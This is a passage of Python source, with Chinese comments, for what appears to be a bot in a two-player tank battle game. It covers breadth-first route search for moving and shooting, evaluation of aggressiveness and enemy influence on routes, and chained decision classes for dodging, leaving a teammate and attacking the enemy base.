能够通过射击行为摧毁的 field 类型,未指定在这个变量里的 所有其他 field 类型均默认视为不可摧毁,在以射击的方式进行 搜索时,遇到这样的 field 会跳过 WARNING: 需要自行制定可以被摧毁的基地、坦克的类型 - x_axis_first bool 是否优先搜索 x 轴方向 - middle_first bool 是否采用中路优先的搜索 Yield From: - routes [Route] 所有可以到达的路径。如果没有搜索到可以到达的路径,则返回空路径 -------------------------------------------------------------------------- def struct Node: // 定义节点模型 [ "xy": (int, int) 目标节点 "parent": Node/None 父节点 "step": int ( >= 0 ) 还差几步到达,为 0 表示到达,初始值为 weight - 1 "weight": const int ( >= 1 ) 权重,即搜索时需要在其上耗费的步数 "last_action": const int 通过什么操作到达这个节点,射击或移动 ] """ x1, y1 = start x2, y2 = end width, height = map_matrix_T.shape matrixMap = map_matrix_T matrixMoveWeight = move_weight_matrix_T matrixShootWeight = shoot_weight_matrix_T # 哪些位置可以移动到 matrixCanMoveTo = np.ones_like(matrixMap, dtype=np.bool8) for _type in block_types: 
matrixCanMoveTo &= (matrixMap != _type) # 那些位置上的 field 可以被摧毁 matrixCanBeDestroyed = np.zeros_like(matrixMap, dtype=np.bool8) for _type in destroyable_types: matrixCanBeDestroyed |= (matrixMap == _type) # 哪些位置可以对目标发动射击,即 end 向四个方向伸展开的区域 matrixCanShoot = np.zeros_like(matrixMap, dtype=np.bool8) matrixCanShoot[x2, y2] = True for dx, dy in get_searching_directions(x1, y1, x2, y2, x_axis_first=x_axis_first, middle_first=middle_first): x, y = end while True: x += dx y += dy if not (0 <= x < width and 0 <= y < height): break elif matrixMap[x, y] == Field.EMPTY: # 空对象 pass elif matrixMap[x, y] == Field.WATER: continue # 水路不可以发动射击,但是可以射过去 elif not matrixCanBeDestroyed[x, y] and (x, y) != start: break # 打一个补丁,不管怎么样,攻击者原地是可以发动射击的 ... matrixCanShoot[x, y] = True if (x, y) == start: # 已经找到了 start 没有必要再继续找下去了 break # debug_print("map:\n", matrixMap.T) # debug_print("weight of move:\n", matrixMoveWeight.T) # debug_print("weight of shoot:\n", matrixShootWeight.T) # debug_print("can move to:\n", matrixCanMoveTo.astype(np.int8).T) # debug_print("can shoot:\n", matrixCanShoot.astype(np.int8).T) # debug_print("can be destroyed:\n", matrixCanBeDestroyed.astype(np.int8).T) startNode = [ (x1, y1), None, 0, # 初始节点本来就已经到达了 0, # 初始节点不耗费步数 NONE_ACTION, # 对于 start == end 的情况,将返回 startNode,相当于原地等待 ] queue = deque() # queue( [Node] ) matrixMarked = np.zeros_like(matrixMap, dtype=np.bool8) # 标记移动到的位置 if DEBUG_MODE: matrixDistance = np.full_like(matrixMap, -1) queue.append(startNode) # init _foundRoute = False while len(queue) > 0: # if start == (8, 1): # debug_print(start) # debug_print([n[0] for n in queue]) node = queue.popleft() if node[2] > 0: # 还剩 step 步 node[2] -= 1 queue.append(node) # 相当于下一个节点 continue x, y = node[0] if (x, y) == end: _foundRoute = True yield Route(node) continue # 1. 如果当前处在射击区域 # 2. 
或者上回合射击(事实上射击行为必定是可延续的,也就是上回合 canShoot 这回合 # 必定应该继续 canShoot ,但是对于 WaterField 来说,不属于可以发动射击的区域 # 因此,如果上回合射进 WaterField 那么上一个判定条件就会失效。但在这种情况下 # 应该视为射击行为延续,因此需要第二个判定条件) # if matrixCanShoot[x, y] or node[4] == SHOOT_ACTION: # 因为在射击区域中,行为的方向都是单向的,不会出现从射击区域进入移动区域, # 或者从射击的下一步移动回到上一步的情况, # 因此没有必要对射击行为已到达过的节点位置进行检查和标记 if DEBUG_MODE: matrixDistance[x, y] = _get_route_length_by_node_chain(node) # 确定射击方向 dx = np.sign(x2 - x) dy = np.sign(y2 - y) x3 = x + dx y3 = y + dy weight = matrixShootWeight[x3, y3] nextNode = [ # 必定可以保证下一个节点仍然处在射击区域,不会到达地图外, (x3, y3), # 并且下次还会继续进入这个分支,除非已经到达基地 node, weight-1, # 补偿 weight, SHOOT_ACTION, # 标志着上一步处在射击区域内 ] if weight == 0: # 射击的过渡动作,下一个动作和当前动作同时发生 queue.appendleft(nextNode) # 添加到开头,下回合马上继续 else: queue.append(nextNode) else: # 否则为非射击区域,属于常规移动区域 if matrixMarked[x, y]: # 只对移动区域进行标记 continue matrixMarked[x, y] = True if DEBUG_MODE: matrixDistance[x, y] = _get_route_length_by_node_chain(node) for dx, dy in get_searching_directions(x1, y1, x2, y2, x_axis_first=x_axis_first, middle_first=middle_first): x3 = x + dx y3 = y + dy if (not (0 <= x3 < width and 0 <= y3 < height) # not in map or not matrixCanMoveTo[x3, y3] ): continue weight = matrixMoveWeight[x3, y3] if weight == INFINITY_WEIGHT: continue queue.append([ (x3, y3), node, weight-1, weight, MOVE_ACTION, # 标志着上一步处在非射击区域内 ]) if not _foundRoute: yield Route() # 空节点 @memorize def find_all_routes_for_move(start, end, matrix_T, block_types=DEFAULT_BLOCK_TYPES, x_axis_first=False, middle_first=False): """ 搜索移动到目标的所有路径 Input: - matrix_T np.array( [[int]] ) 游戏地图的类型矩阵的转置 Yield From: - route Route """ matrixMap = matrix_T matrixWeight = np.ones_like(matrixMap) matrixWeight[matrixMap == Field.BRICK] = 1 + 1 # 射击一回合,移动一回合 matrixWeight[matrixMap == Field.STEEL] = INFINITY_WEIGHT matrixWeight[matrixMap == Field.WATER] = INFINITY_WEIGHT routes = _BFS_search_all_routes_for_move( start, end, matrixMap, matrixWeight, block_types=block_types, x_axis_first=x_axis_first, middle_first=middle_first) yield from 
routes @memorize def find_all_routes_for_shoot(start, end, matrix_T, block_types=DEFAULT_BLOCK_TYPES, destroyable_types=DEFAULT_DESTROYABLE_TYPES, x_axis_first=False, middle_first=False): """ 搜索移动并射击掉目标的所有路径 输入输出同上 """ matrixMap = matrix_T matrixMoveWeight = np.ones_like(matrixMap) # weight 默认为 1,即移动一回合 matrixMoveWeight[matrixMap == Field.BRICK] = 1 + 1 # 射击一回合,移动一回合 matrixMoveWeight[matrixMap == Field.STEEL] = INFINITY_WEIGHT matrixMoveWeight[matrixMap == Field.WATER] = INFINITY_WEIGHT matrixShootWeight = np.zeros_like(matrixMap) # weight 默认为 0 ,即炮弹可以飞过 matrixShootWeight[matrixMap == Field.BRICK] = 1 + 1 # 射击一回合,冷却一回合 matrixShootWeight[matrixMap == Field.STEEL] = INFINITY_WEIGHT for _type in BASE_FIELD_TYPES: matrixShootWeight[matrixMap == _type] = 1 # 射击一回合,之后就赢了 for _type in TANK_FIELD_TYPES: matrixShootWeight[matrixMap == _type] = 1 + 1 # 射击一回合,冷却一回合 # WARNING: # 这里只是从理论上分析 TANK, BASE 被打掉对应的权重,实际上我们不希望基地和队友 # 被打掉,因此在实际使用时,仅仅在 destroyable_types 中添加敌方的坦克即可 routes = _BFS_search_all_routes_for_shoot( start, end, matrixMap, matrixMoveWeight, matrixShootWeight, block_types=block_types, destroyable_types=destroyable_types, x_axis_first=x_axis_first, middle_first=middle_first) yield from routes def find_shortest_route_for_move(*args, **kwargs): """ 搜索移动到目标的最短路径 """ for route in find_all_routes_for_move(*args, **kwargs): return route # 直接返回第一个 route def find_shortest_route_for_shoot(*args, **kwargs): """ 搜索移动并射击掉目标的最短路径 """ for route in find_all_routes_for_shoot(*args, **kwargs): return route # 直接返回第一个 route def _get_route_length_by_node_chain(node): """ [DEBUG] 传入 node chain head ,计算其所代表的节点链对应的距离 Return: - length int 路线长度,如果是空路线,返回 无穷大长度 """ assert isinstance(node, list) and len(node) == 5 dummyHead = [ NONE_POINT, node, -1, -1, DUMMY_ACTION, ] route = [] node = dummyHead while True: node = node[1] if node is not None: x, y = node[0] weight = node[3] route.append( (x, y, weight) ) else: break if len(route) == 0: return INFINITY_ROUTE_LENGTH return np.sum( r[2] for r in 
route ) #{ END 'strategy/search.py' }# #{ BEGIN 'strategy/evaluate.py' }# def evaluate_aggressive(battler, oppBattler, strict=False, allow_withdraw=True): """ 根据敌我两架坦克的攻击线路长短,衡量当前侵略性 Input: - battler BattleTank - oppBattler BattleTank - strict bool 是否严格依据路线长度和两方基地位置进行评估 如果为 False ,则还会考虑其他的因素 - allow_withdraw bool 是否允许撤退 Return: [status] - Status.AGGRESSIVE 我方处于攻击状态 - Status.DEFENSIVE 我方处于防御状态 - Status.STALEMENT 双方处于僵持状态 - Status.WITHDRAW 我方处于撤退状态 """ map_ = battler._map BattleTank = type(battler) myRoute = battler.get_shortest_attacking_route() oppRoute = oppBattler.get_shortest_attacking_route() # 可能会遇到这种糟糕的情况,队友挡住了去路 5cdde41fd2337e01c79f1284 #-------------------------- if myRoute.is_not_found() or oppRoute.is_not_found(): return Status.AGGRESSIVE # 应该可以认为是侵略吧 # assert not myRoute.is_not_found() and not oppRoute.is_not_found(), "route not found" leadingLength = oppRoute.length - myRoute.length #debug_print(battler, oppBattler, "leading:", leadingLength) if battler.is_in_enemy_site(): # 在敌方半边地图,更倾向于不防御 if leadingLength >= 1: status = Status.AGGRESSIVE elif leadingLength < -3: status = Status.DEFENSIVE else: status = Status.STALEMENT else: # # 在我方半边地盘,会增加防御的可能性 # 差一步都要算作防御! # if leadingLength >= 1: status = Status.AGGRESSIVE # [1, +) elif -1 < leadingLength < 1: status = Status.STALEMENT # (-1, 1) -> 0 elif -2 <= leadingLength <= -1: status = Status.DEFENSIVE # [-2, -1] else: if allow_withdraw and battler.is_in_our_site(include_midline=True): # 包含中线,放松一点条件 status = Status.WITHDRAW # (-, -2) else: status = Status.DEFENSIVE # 否则不要撤退? if strict: # 严格模式直接返回评估状态 return status # # 撤退性状态直接返回 # if status == Status.WITHDRAW: return status # # 尽可能用攻击性策略! 
# # 还要判断对方的攻击路线是否可能会被我方队员阻拦 # 否则就过度防御了 5ce69a15d2337e01c7a90646 # if status != Status.AGGRESSIVE: map_ = battler._map tank = battler.tank teammate = None for _tank in map_.tanks[tank.side]: if _tank is not tank: teammate = _tank break if not teammate.destroyed: teammateBattler = BattleTank(teammate) for action in teammateBattler.get_all_valid_move_actions() + [ Action.STAY ]: with map_.simulate_one_action(teammateBattler, action): if teammateBattler.xy in oppRoute: # 此时视为侵略模式 return Status.AGGRESSIVE return status def estimate_route_similarity(route1, route2): """ 评估两条路线的相似度 一般用于判断选择某条路线是否可以和敌人相遇 实现思路: -------------- 首先找出两者中最短的一条路径,对于其上每一个点,在另一条路上寻找与之距离最短(曼哈顿距离即可) 的点,并将这两个点之间的距离作为总距离的一个部分,每个分距离和相应点的权重的加权平均值即为总距离 最后的估值为 总距离除以最短路线的坐标点数的均值 的倒数 值越接近 1 表示越相近,值越接近 0 表示越不相近 根据实际情景的需要,我们将较长路劲多出来的那些点忽略 ... TODO: ------------- 1. 如何考虑坐标权重 2. 如何考虑长路径中多出来的那些点 """ route1 = [ (node.x, node.y, node.weight) for node in route1 ] route2 = [ (node.x, node.y, node.weight) for node in route2 ] if len(route1) > len(route2): # 确保 route1 坐标数不超过 route2 route1, route2 = route2, route1 total = 0 for x1, y1, weight in route1: d = np.min([ get_manhattan_distance(x1, y1, x2, y2) for x2, y2, _ in route2 ]) total += d * weight return 1 / ( total / len(route1) + 1 ) def estimate_enemy_effect_on_route(route, player): """ 衡量敌人对我方所选的进攻路线的影响程度 ---------------------------------------- 敌人在进攻路线两侧,可能会阻碍进攻,也就是增加了相应路线进攻的回合数, 因此敌人的影响可以量化为相应路线长度的增加量。 将理论路线长度与敌人的影响所导致的长度增加量相加,所得的估值可以认为是 考虑了敌人影响后的真实路线长度,可以将这个真实路线长度对所选路线进行重新 排序,从而选出距离短,且受敌人影响最小的攻击路线 如何估计敌人影响? 
    ------------------
    收集敌人当前所在位置所能影响到(近乎可认为是能射击到)的坐标。为了确保更加接近真实的情况,
    再假设敌人当前回合能射击,模拟敌人所有可以执行的动作(包括移动和射击,考虑射击是因为有可能可以
    摧毁一些土墙),之后同法收集敌人所能影响到的坐标。将这一坐标集所对应的区域视为受到敌人影响的区域。
    随后统计当前路径与该坐标集的重叠程度(路径上的坐标出现在该坐标集内的,可视为重叠。这种路径节点的
    数量越多,重叠程度越大),并认为这一重叠程度与敌人的影响程度正相关,也就是重叠的坐标点数与
    路径长度的增长量正相关,从而实现量化估计。

    特别的,如果敌人出现在攻击路线上,会造成较大的路线长度增加,有时甚至可以视为此路不通。

    TODO:
    ---------
    这种简单的静态分析策略可能存在对某些具体情况估计不到位的问题。当我方坦克沿着这条路线走到需要和
    敌人正面交锋的位置时,有的时候可以通过闪避直接躲开,这种情况的影响可能比较小。而有的情况下是无法躲开的,
    我方坦克只能选择往回闪避,这就相当于判定了这条路为死路 5cd24632a51e681f0e912613
    (然而事实上情况还可以更加复杂,因为实际进攻的时候,有可能会采用一些特殊的策略,让这条路转化为活路,
    例如预先打掉与我距离为 2 的墙)。
    而在静态分析中,这些具体的差别可能无法区分,因此和更加真实合理的估计间可能存在着一定的差距。
    但是采用动态分析可能不是一件很现实的事情,因为需要不断地模拟移动和模拟决策,一方面会造成算法过于
    耗时,一方面也有可能会引入各种混乱(实现无差异地在多回合模拟移动和模拟决策间回滚,并且确保面向真实情况
    决策的代码也能适用于模拟决策的情况,这将会是一个浩大的工程)。

    Input:
        - route    Route         待评估的路线
        - player   Tank2Player   将会采用这条路线的玩家对象
    """
    map_ = player._map # 通过玩家对象引入 map 全局对象

    # Penalty constants added to the theoretical route length.
    LENGTH_INCREMENT_OF_ENEMY_INFLUENCED = 1  # 受到敌人射击影响所导致的路线长度增量
    LENGTH_INCREMENT_OF_ENEMY_BLOCKING = 10   # 敌人位于路线上所导致的路线长度增量

    enemyInfluencedPoints = set() # 受敌人影响的坐标集
    enemyBlockingPoints = set()   # 敌人阻塞的坐标集

    for oppBattler in [ oppPlayer.battler for oppPlayer in player.opponents ]:
        if oppBattler.destroyed:
            continue
        with map_.simulate_one_action(oppBattler, Action.STAY): # 刷新射击回合
            for action in oppBattler.get_all_valid_actions(): # 包含了原地停止
                with map_.simulate_one_action(oppBattler, action):
                    with map_.simulate_one_action(oppBattler, Action.STAY): # 同理刷新冷却
                        enemyBlockingPoints.add( oppBattler.xy )   # blocking
                        enemyInfluencedPoints.add( oppBattler.xy ) # 先加入敌人当前坐标
                        # Scan outwards in each direction, collecting squares the
                        # enemy could effectively shoot at from this position.
                        for dx, dy in get_searching_directions(*oppBattler.xy):
                            x, y = oppBattler.xy
                            while True:
                                x += dx
                                y += dy
                                if not map_.in_map(x, y):
                                    break
                                fields = map_[x, y]
                                if len(fields) == 0:
                                    pass
                                elif len(fields) > 1: # 两个以上敌人,不划入影响范围,并直接结束
                                    break
                                else:
                                    field = fields[0]
                                    if isinstance(field, EmptyField):
                                        pass
                                    elif isinstance(field, WaterField):
                                        continue # 水路可以认为不影响
                                    #elif isinstance(field, (BaseField, BrickField, SteelField, TankField) ):
                                    else:
                                        break # block 类型,不划入影响范围,并直接结束
                                enemyInfluencedPoints.add( (x, y) ) # 以 pass 结尾的分支最后到达这里

    realLength = route.length # 初始为路线长度

    for node in route:
        xy = node.xy
        if xy in enemyInfluencedPoints:
            if node.weight > 0: # 射击的过渡点 weight == 0 它,它实际上不受敌人射击的影响
                realLength += LENGTH_INCREMENT_OF_ENEMY_INFLUENCED
        if xy in enemyBlockingPoints: # 敌人阻塞,可以影响射击点,因此同等对待
            realLength += LENGTH_INCREMENT_OF_ENEMY_BLOCKING

    return realLength


def estimate_route_blocking(route):
    """
    Estimate the amount of block-type fields on a route.
    ----------------------------------------------------
    Used when evaluating withdrawal routes: withdrawing happens near our own
    base, where destroying walls should be avoided because it may weaken the
    base's defense.

    Implementation
    --------------
    Increase the effective weight of block-type nodes, so routes containing
    more blocks end up with a larger estimated length.

    TODO: should blocks on routes with the same block count be weighted
    further, i.e. should the walls immediately around the base count more?
    """
    x2, y2 = route.end

    LENGTH_INCREMENT_OF_BLOCK = 1           # 遇到墙,权重加 1
    LENGTH_INCREMENT_OF_INNERMOST_BLOCK = 2 # 遇到最内层的墙,权重加 2

    realLength = route.length
    for node in route:
        x1, y1 = node.xy
        if node.weight == 2: # 权重为 2 的块一定是 block 类型
            if np.abs(x1 - x2) <= 1 and np.abs(y1 - y2) <= 1: # 位于 end 的外围
                realLength += LENGTH_INCREMENT_OF_INNERMOST_BLOCK
            else:
                realLength += LENGTH_INCREMENT_OF_BLOCK

    return realLength

#{ END 'strategy/evaluate.py' }#

#{ BEGIN 'decision/abstract.py' }#

class DecisionMaker(object):
    """
    Abstract base class for anything capable of making a decision.
    --------------------------------------------------------------
    This covers concrete decision makers such as Team and Player as well as
    abstract decision classes. Subclasses wrap a particular piece of decision
    logic; decision-class subclasses split the decision tree into reusable,
    readable units.
    """
    UNHANDLED_RESULT = None

    def __init__(self, *args, **kwargs):
        # Direct instantiation of the abstract base is forbidden.
        if self.__class__ is __class__:
            raise NotImplementedError

    def is_handled(self, result):
        """
        Tell (from outside) whether the result returned by this decision maker
        means the decision applies to the current situation.

        By convention an unhandled situation yields __class__.UNHANDLED_RESULT,
        so comparing against it is sufficient.
        """
        return result != self.__class__.UNHANDLED_RESULT

    def _make_decision(self):
        """
        The real decision hook to be overridden by subclasses.

        If the situation does not apply, simply return nothing (None);
        make_decision uses this to detect an unhandled case.
        """
        raise NotImplementedError

    def make_decision(self):
        """
        外部可调用的决策接口
        ----------------------
        会对 _make_decision 的结果进行一些统一的处理,也可以用于在决策前后进行一些预处理和后处理操作

        此处提供一个默认的情况的处理方法:
        ----------------------------------
        - 如果真正的决策函数返回了一个 action ,则将其作为最终结果直接返回
        -
          如果当前情况不适用,真正的决策函数返回了 None ,则返回 UNHANDLED_RESULT
        """
        res = self._make_decision()
        if res is None:
            return self.__class__.UNHANDLED_RESULT
        return res


class SingleDecisionMaker(DecisionMaker):
    """
    Abstract base class for single-player decisions, used by Tank2Player.
    """
    UNHANDLED_RESULT = Action.INVALID

    def __init__(self, player, signal):
        """
        Overridden constructor; its parameter list matches the
        Tank2Player._make_decision interface.

        Input:
            - player   Tank2Player   the single-player instance
            - signal   int           team signal
        """
        self._player = player
        self._signal = signal

        if self.__class__ is __class__:
            raise NotImplementedError


class RespondTeamSignalDecisionMaker(SingleDecisionMaker):
    """
    Decision model for responding to team signals.

    注意:
    ------------
    """
    UNHANDLED_RESULT = ( Action.INVALID, Signal.INVALID )
    HANDLED_SIGNALS = ( ) # 将会处理到的团队信号

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        if self.__class__ is __class__:
            raise NotImplementedError

    def make_decision(self):
        """
        If the team sent a signal this decision maker claims to handle, a
        result MUST be produced; only when the signal is absent may
        UNHANDLED_RESULT be returned.
        """
        res = self._make_decision()
        if res is None:
            signal = self._signal
            if signal in self.__class__.HANDLED_SIGNALS: # 团队信号必须得到响应
                raise Exception("team signal %d must be responded" % signal)
            return self.__class__.UNHANDLED_RESULT
        return res


class TeamDecisionMaker(DecisionMaker):
    """
    Abstract base class for team decisions, used by Tank2Team's two-player
    decision making.

    Unlike SingleDecision, a TeamDecision has no single "best" decision maker:
    every team decision maker attempts a decision. Decisions are prioritized;
    once a higher-priority maker has coordinated a player's action, a
    lower-priority maker should not override that result (with very special
    exceptions). When chained via DecisionChain, every maker on the chain is
    guaranteed to run once.
    """
    def __init__(self, team):
        self._team = team # Tank2Team
        if self.__class__ is __class__:
            raise NotImplementedError

    def is_handled(self, result):
        """
        Overridden so that a DecisionChain always continues to the next team
        decision maker, regardless of the result.
        """
        return False

    def _make_decision(self, *args, **kwargs):
        """
        派生类重写的 _make_decision 要求返回值必须是 [int, int]
        """
        raise NotImplementedError
        return [ Action.INVALID, Action.INVALID ]

    def make_decision(self):
        """
        重写 makd_decision 接口

        确保在决策完成后 player1, player2 的决策结果与返回结果同步
        这主要考虑到在决策的时候可能会忘记 create_snapshot ...
        """
        team = self._team
        player1, player2 = team.players

        action1, action2 = self._make_decision()
        # Keep each player's recorded decision in sync with what we return.
        player1.set_current_decision(action1)
        player2.set_current_decision(action2)

        return [ action1, action2 ]

#{ END 'decision/abstract.py' }#

#{ BEGIN 'decision/chain.py' }#

class DecisionChain(DecisionMaker):
    """
    Decision chain
    --------------
    Modeled after the chain-of-responsibility pattern: combines several
    decision instances and tries them in priority order. The first decision
    that handles the situation determines the result; otherwise the next,
    lower-priority decision is tried.
    """
    UNHANDLED_RESULT = None

    def __init__(self, *decisions):
        self._decisions = decisions
        for decision in self._decisions: # 确保所有的 decision 实例均为 DecisionMaker 的派生
            assert isinstance(decision, DecisionMaker)

    def _make_decision(self):
        for decision in self._decisions:
            res = decision.make_decision()
            if decision.is_handled(res):
                return res

#{ END 'decision/chain.py' }#

#{ BEGIN 'decision/single/leave_teammate.py' }#

class LeaveTeammateDecision(RespondTeamSignalDecisionMaker):
    """
    Handles the case where the two teammates overlap.
    -------------------------------------------------
    1. Try to leave the teammate with a safe move action.
    2. Avoid moving in the same direction as the teammate.
    3. Prefer a direction that does not lengthen the attacking route.
    """
    HANDLED_SIGNALS = ( Signal.SHOULD_LEAVE_TEAMMATE, )

    def _make_decision(self):
        player = self._player
        signal = self._signal
        map_ = player._map
        battler = player.battler
        teammate = player.teammate

        if signal == Signal.SHOULD_LEAVE_TEAMMATE:
            actions = []
            for action in battler.get_all_valid_move_actions():
                if not Action.is_move(player.try_make_decision(action)): # 存在风险
                    continue
                if action == teammate.get_current_decision(): # 不能与队友的移动方向相同!
                    continue
                actions.append(action)

            if len(actions) == 0: # 没有合理的离开行为 ...
                return ( Action.STAY, Signal.CANHANDLED )

            route1 = battler.get_shortest_attacking_route()
            deltaLengths = {} # action -> deltaLength
            for action in actions:
                with map_.simulate_one_action(battler, action):
                    route2 = battler.get_shortest_attacking_route() # 必定有路?
deltaLengths[action] = route2.length - route1.length # 移动后进攻路线短变短者值小 action = min( deltaLengths.items(), key=lambda kv: kv[1] )[0] player.set_status(Status.READY_TO_LEAVE_TEAMMATE) return ( action, Signal.READY_TO_LEAVE_TEAMMATE ) #{ END 'decision/single/leave_teammate.py' }# #{ BEGIN 'decision/single/attack_base.py' }# class AttackBaseDecision(SingleDecisionMaker): """ 特殊情况决策,当下一步就要拆掉敌方基地时 """ def _make_decision(self): player = self._player battler = player.battler # TODO: # 可能需要考虑一种特殊情况: 队友被杀,自己下一步打掉对方基地,但是对方下一步把我干掉 # 这种情况下,即使我方拆掉对方基地也算平局。也许可以考虑先闪避一回合,然后再继续拆家。 # if battler.is_face_to_enemy_base() and battler.canShoot: player.set_status(Status.READY_TO_ATTACK_BASE) # 特殊状态 return battler.get_next_attacking_action() # 必定是射击 ... #{ END 'decision/single/attack_base.py' }# #{ BEGIN 'decision/single/encount_enemy.py' }# class EncountEnemyDecision(SingleDecisionMaker): """ 遭遇敌人时的决策 """ def _make_decision(self): player = self._player signal = self._signal map_ = player._map tank = player.tank battler = player.battler teammate = player.teammate Tank2Player = type(player) BattleTank = type(battler) aroundEnemies = battler.get_enemies_around() if len(aroundEnemies) > 0: player.set_status(Status.ENCOUNT_ENEMY) if len(aroundEnemies) > 1: # 两个敌人,尝试逃跑 assert len(aroundEnemies) == 2 # 可能会遇到极其罕见的三人重叠 # 首先判断是否为真正的双人夹击 enemy1, enemy2 = aroundEnemies x, y = tank.xy x1, y1 = enemy1.xy x2, y2 = enemy2.xy # 先判断敌人是否重叠,如果是,那么很有可能直接击杀! 
                # NOTE(review): continuation of EncountEnemyDecision._make_decision,
                # transcribed verbatim with reconstructed formatting.
                if (x1, y1) == (x2, y2):
                    if (not teammate.defeated # 队友还没有死,自己可以考虑牺牲
                        and battler.canShoot
                        ):
                        player.set_status(Status.ENCOUNT_TWO_ENEMY)
                        player.set_status(Status.READY_TO_DOUBLE_KILL_ENEMIES)
                        player.set_status(Status.READY_TO_FIGHT_BACK)
                        return battler.shoot_to(enemy1)

                if x1 == x2 == x:
                    if (y > y1 and y > y2) or (y < y1 and y < y2):
                        player.set_status(Status.ENCOUNT_ONE_ENEMY)
                        pass # 实际可视为一个人
                elif y1 == y2 == y:
                    if (x > x1 and x > x2) or (x < x1 and x < x2):
                        player.set_status(Status.ENCOUNT_ONE_ENEMY)
                        pass
                else: # 真正的被夹击
                    player.set_status(Status.ENCOUNT_TWO_ENEMY)
                    oppBattlers = [ BattleTank(_enemy) for _enemy in aroundEnemies ]
                    if all( oppBattler.canShoot for oppBattler in oppBattlers ):
                        # 如果两者都有弹药,可能要凉了 ...
                        player.set_status(Status.DYING)
                        if battler.canShoot:
                            # TODO: 这种情况下有选择吗?
                            player.set_status(Status.READY_TO_FIGHT_BACK)
                            return battler.shoot_to(enemy1) # 随便打一个?
                    elif all( not oppBattler.canShoot for oppBattler in oppBattlers ):
                        # 均不能进攻的话,优先闪避到下回合没有敌人的位置(优先考虑拆家方向)
                        firstMoveAction = tuple()
                        attackAction = battler.get_next_attacking_action()
                        if Action.is_move(attackAction): # 如果是移动行为
                            firstMoveAction = ( attackAction, )
                        for action in firstMoveAction + Action.MOVE_ACTIONS:
                            if map_.is_valid_move_action(tank, action):
                                with map_.simulate_one_action(tank, action):
                                    if len( battler.get_enemies_around() ) < 2: # 一个可行的闪避方向
                                        player.set_status(Status.READY_TO_DODGE)
                                        return action
                        # 均不能闪避,应该是处在狭道内,则尝试任意攻击一个
                        if battler.canShoot:
                            # TODO: 是否有选择?
                            player.set_status(Status.READY_TO_FIGHT_BACK)
                            return battler.shoot_to(enemy1) # 随便打一个
                    else: # 有一个能射击,则反击他
                        for oppBattler in oppBattlers:
                            if oppBattler.canShoot: # 找到能射击的敌人
                                actions = battler.try_dodge(oppBattler)
                                if len(actions) == 0: # 不能闪避
                                    if battler.canShoot:
                                        player.set_status(Status.READY_TO_FIGHT_BACK)
                                        return battler.shoot_to(oppBattler)
                                    else: # 要凉了 ...
                                        break
                                elif len(actions) == 1:
                                    action = player.try_make_decision(actions[0])
                                else:
                                    action = player.try_make_decision(actions[0],
                                                    player.try_make_decision(actions[1]))
                                if Action.is_move(action): # 统一判断
                                    player.set_status(Status.READY_TO_DODGE)
                                    return action
                                # 没有办法?尝试反击
                                if battler.canShoot:
                                    player.set_status(Status.READY_TO_FIGHT_BACK)
                                    return battler.shoot_to(oppBattler)
                                else: # 要凉了
                                    break
                        # 没有办法对付 ..
                        player.set_status(Status.DYING)
                # 无所谓的办法了...
                return player.try_make_decision(battler.get_next_attacking_action())

            # TODO:
            #   虽然说遇到了两个一条线上的敌人,但是这不意味着后一个敌人就没有威胁 5ccee460a51e681f0e8e5b17
            #
            # 当前情况:
            # ---------
            # 1. 敌人数量为 2 但是一个处在另一个身后,或者重叠,可视为一架
            # 2. 敌人数量为 1
            #
            if len(aroundEnemies) == 1:
                oppTank = aroundEnemies[0]
            else: # len(aroundEnemies) == 2:
                oppTank = battler.get_nearest_enemy()
            oppBattler = BattleTank(oppTank)
            oppPlayer = Tank2Player(oppBattler)

            #
            # (inserted) 判断上回合敌人是否和我重叠,用于标记敌人 5ce52a48d2337e01c7a714c7
            #
            if (player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1)
                and not player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=2)
                and not Action.is_move(player.get_previous_action(back=1)) # 且不是因为我方主动打破重叠导致
                ): # 上回合刚刚进入重叠,这回合就被打破
                with map_.rollback_to_previous():
                    if oppTank is battler.get_overlapping_enemy():
                        oppPlayer.add_labels(Label.IMMEDIATELY_BREAK_OVERLAP_BY_MOVE)

            #
            # 在非 WITHDRAW 的情况下,评估当前侵略性
            #
            if not player.has_status(Status.WITHDRAW):
                _allowWithdraw = ( WithdrawalDecision.ALLOW_WITHDRAWAL
                                    and not player.has_label(Label.DONT_WITHDRAW) )
                status = evaluate_aggressive(battler, oppBattler, allow_withdraw=_allowWithdraw)
                player.set_status(status)
            else:
                status = Status.WITHDRAW

            # 侵略模式/僵持模式
            #----------
            # 1. 优先拆家
            # 2. 只在必要的时刻还击
            # 3. 闪避距离不宜远离拆家路线
            #
            if status == Status.AGGRESSIVE or status == Status.STALEMENT:
                if not oppBattler.canShoot:
                    # 如果能直接打死,那当然是不能放弃的!!
                    if len( oppBattler.try_dodge(battler) ) == 0: # 必死
                        if battler.canShoot:
                            player.set_status(Status.READY_TO_KILL_ENEMY)
                            return battler.shoot_to(oppBattler)

                    attackAction = battler.get_next_attacking_action() # 其他情况,优先进攻,不与其纠缠
                    realAction = player.try_make_decision(attackAction) # 默认的进攻路线
                    if Action.is_stay(realAction): # 存在风险
                        if Action.is_move(attackAction):
                            #
                            # 原本移动或射击,因为安全风险而变成停留,这种情况可以尝试射击,充分利用回合数
                            #
                            # TODO:
                            #   实际上,很多时候最佳路线选择从中线进攻,但从两侧进攻也是等距离的,
                            #   在这种情况下,由于采用从中线的进攻路线,基地两侧的块并不落在线路上,因此会被
                            #   忽略,本回合会被浪费。但是进攻基地两侧的块往往可以减短路线。因此此处值得进行
                            #   特殊判断
                            #
                            fields = battler.get_destroyed_fields_if_shoot(attackAction)
                            route = battler.get_shortest_attacking_route()
                            for field in fields:
                                if route.has_block(field): # 为 block 对象,该回合可以射击
                                    action = player.try_make_decision(battler.shoot_to(field))
                                    if Action.is_shoot(action):
                                        player.set_status(Status.PREVENT_BEING_KILLED)
                                        player.set_status(Status.KEEP_ON_MARCHING)
                                        return action
                            # TODO: 此时开始判断是否为基地外墙,如果是,则射击
                            for field in fields:
                                if battler.check_is_outer_wall_of_enemy_base(field):
                                    action = player.try_make_decision(battler.shoot_to(field))
                                    if Action.is_shoot(action):
                                        player.set_status(Status.PREVENT_BEING_KILLED)
                                        player.set_status(Status.KEEP_ON_MARCHING)
                                        return action

                        # 刚刚对射为两回合,该回合双方都没有炮弹,尝试打破僵局
                        #---------------------------------------------------
                        # 当前为侵略性的,并且在对方地盘,尝试回退一步,与对方重叠。
                        # 后退操作必须要有限制 5cd10315a51e681f0e900fa8
                        #
